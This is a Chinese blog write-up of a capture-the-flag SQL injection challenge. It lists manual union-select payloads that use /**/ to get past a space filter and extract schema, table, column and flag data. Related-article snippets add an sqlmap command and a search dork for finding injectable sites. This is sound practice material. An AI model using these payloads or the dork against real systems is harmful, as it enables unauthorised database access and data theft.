简单的sql注入之2 / writeup (手工注入,纯属练手)

最新推荐文章于 2025-07-16 17:43:33 发布
最新推荐文章于 2025-07-16 17:43:33 发布
阅读量2k 收藏 1
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wewww111/article/details/81571245
本文介绍了一种通过SQL注入攻击来获取数据库信息的方法。利用特殊字符绕过空格限制,构造SQL语句,实现对数据库、表及字段信息的获取。具体步骤包括确认注入点、确定字段数、获取数据库名称等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

多测试几次可以发现,空格被注释了,百度解决方法,用/**/代替空格的位置,

构造语句1'/**/or/**/'1'='1 确认为单引号注入

用order by 确认select字段数,以确定union的字段数

可得,只有一个字段

获取数据库 

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/#

获取数据库web1的所有表名 

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='web1'/**/#

看到flag表,获取字段名

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where table_name='flag'/**/#

获取flag

1'/**/union/**/select/**/flag/**/from/**/flag/**/#

 

wewww111
关注
[网络安全提高篇] 一〇五.SQL注入之揭秘Oracle数据库注入漏洞和致命问题(联合Cream老师)
杨秀璋的专栏
03-24 6938
前文带领大家搭建一个Oracle+phpStudy本地网络渗透靶场,并应用SQL注入、XSS攻击、文件上传漏洞三个场景。这篇文章将跟着Cream老师兼好友学习,结合自己的经验详细介绍Oracle数据库注入漏洞和致命问题,包括各种类型的注入知识。注入漏洞是安全威胁中比较常见的漏洞,Oracle也是用得最广的数据库,希望这篇文章对您有帮助。真心觉得Cream老师讲解非常厉害,且看且珍惜。
实验吧 ctf 题目简单sql注入2writeup
ZweLL032的博客
03-11 6369
解题链接: http://ctf5.shiyanbar.com/web/index_2.php 1.输入id值,通过回显发现题目应该是进行了空格过滤 2.使用sqlmap进行注入    2.1  python sqlmap.py  -u "http://ctf5.shiyanbar.com/web/index_2.php?id=1" --random-agent  --tampe
实验吧——SQL注入 Write up()
Lemon's blog
08-05 585
前言:之前学习过了联合注入查询、布尔盲注、时间盲注等,这次就通过实验吧的SQL注入题来加强一下。 简单sql注入 输入有回显,且有输入框,那就可以用联合查询的方法来注入 题中提示已经过滤了一些关键字,那么就先来查看题中过滤的是哪些关键字 ?id=1 union select order by # 回显结果: union,select等都被过滤而且没有报错说明#也被过滤 可以自己建立一个语句...
sql注入 练手网站_靶场sql注入练手----sqlmap篇(纯手打)
weixin_36352432的博客
12-23 458
靶场地址:封神台方法一、首先尝试手工注入点判断第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车,页面返回正常构造 ?id=1 and 1=2 ,回车,页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车,页面正常构造 ?id=1 and 1=1 order by 2 回车,页面正常构造 ?id=1...
sql手工注入
最新发布
rasssel的博客
07-16 689
SQL注入是一种将恶意SQL语句插入应用程序的输入字段中,并提交到后台数据库服务器执行的攻击方式。通过注入可以绕过认证、读取敏感数据、修改数据甚至获取服务器权限。
sql注入、cookie注入练手网站
深海蓝的技术随笔
07-16 8968
google搜索关键词:inurl: asp?id=
sql注入练习工具
11-08
sql注入小工具 测试sql注入 安全类 仅供 学习参考使用
实验吧——(web)简单SQL注入12 writeup
qq_39480875的博客
05-22 610
判断注入类型 输入:1 输入:1’ 出现报错,初步猜测这是一个字符型的注入。 尝试一些基本的语句: 输入: 1' union select schema_name from information_schema.schemata where '1' ='1 又出现报错。union select被过滤 测试了几个关键词以后,发现都被过滤了 关键词被过滤:解决方法如下 1大小写交替: Ord...
【PTE】承制科技培训SQL注入题目writeup
HkD01L的博客
11-22 912
承制科技的pte培训课程提供的靶场,sql注入题目writeup
封神台 sql 注入靶场 writeup
白帽渗透笔记的博客
07-21 958
今天给大家带来封神台 sql 注入靶场前 4 关的解题思路,并不算难。 地址 https://hack.zkaq.cn/battle#bid=cd23d4b58f0dfd3e 0x01 首先判断是否存在注入点,修改地址,尝试 id=1 and 1=1 可以正常显示数据,id=1 and 1=2 无法显示数据,故存在注入。 继续猜解字段数,id=1 order by 1 可以正常显示数据,一直到 4 才无法显示,故字段数为 3,使用 id=1 and 1=2 union select 1,
CTFHub技能树.Web.SQL注入 WriteUpSQL注入学习笔记
qq_45716477的博客
04-19 679
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=11 and 1=2
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 731
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过11'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
实验吧-简单sql注入2 Writeup
baynk的博客
07-28 326
抓紧时间来搞,事情越来越多。。。 过程 输入1'后有报错,单引号闭合,尝试了--+和%23均无法注释,又试过了构造闭合,发现and和or也都用不了。加上这次只要被检测出来就直接就有提示界面,并不像上一个那样有信息可看,感觉挺麻烦的。 于是判断到底是如何被检测的,然后试过了双写,大小写啥的,都不行,于是我直接把所有的空格都去掉了,写成了1'and1='1,这次总算有提示了。 从上面就能看出来,如果...
实验吧-简单sql注入3 Writeup
baynk的博客
07-29 418
继续继续 过程 输入1,然后发现只有一个hello。。。好吧,肯定得盲注了,先试试闭合吧,果然还是单引号的,但是居然有报错信息,应该也可以使用报错注入吧。 然后再尝试干掉单引号的时候意外发现#居然可以用了,这真是省了不少事。。 想来想去还是使用报错注入,盲注还是交给sqlmap来解决吧。先来搞库名,用的floor(),结果来这么一出。 don't到底是个啥,又换了两种其他的报错,updatexm...
SQL注入】CTF练习题WriteUp——“百度杯”CTF比赛 九月场SQL
Fighting_hawk的博客
05-17 4019
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
CTF之旅(CTFHub技能树+详细Write up+持续更新ing)SQL注入
weixin_51563603的博客
09-04 1831
目录其他CTFHub题目WriteUP地址前言SQL注入整数型注入字符型注入 其他CTFHub题目WriteUP地址 本来不想分段的,但是后来发现要写的东西太多了,就分了几段写,大家见谅 1.web前置技能(已完结) 2.信息泄露(已完结) 3.密码口令+XSS(已完结) 前言 这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF ,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻 防世界的意
fakebook writeup sql注入思路
weixin_45253216的博客
01-20 380
2021.1.20 网鼎杯的一道题。 习惯性拿到题目先扫目录 发现了robots.txt。 看到了/user.php.bak这个,应该是源码泄漏。 bak文件可以下载到本地,bak是back-up 备份文件,需要改为对应文件名才能打开,这里就把user.php.bak,改为user.php即可。 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; publi
sql注入手工注入的一般套路
qq_25987491的博客
04-14 2248
这道题不是考工具使用,我们要练习手工注入……. 题目:简单sql注入之3 地址:http://www.shiyanbar.com/ctf/1909 没有手工注入的小伙伴们看看了,跟着daoskc的思路一起学习下。 本文的手工的暴力猜解都由BurpSuite完成 首先先作判断: 正常情况下输入?id=1,页面正常输出hello,?id=0页面不输出 输入?id=’页面直接报SQL语法错...
SQL注入漏洞分析:Web渗透解决方案
"web渗透writeup - 漏洞分析与利用" 这篇描述涉及的是一个Web应用程序中的SQL注入漏洞利用,以及如何通过PHP代码逻辑来获取flag。问题的关键在于一个PHP脚本,它处理用户登录并执行SQL查询来验证用户身份。在分析...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值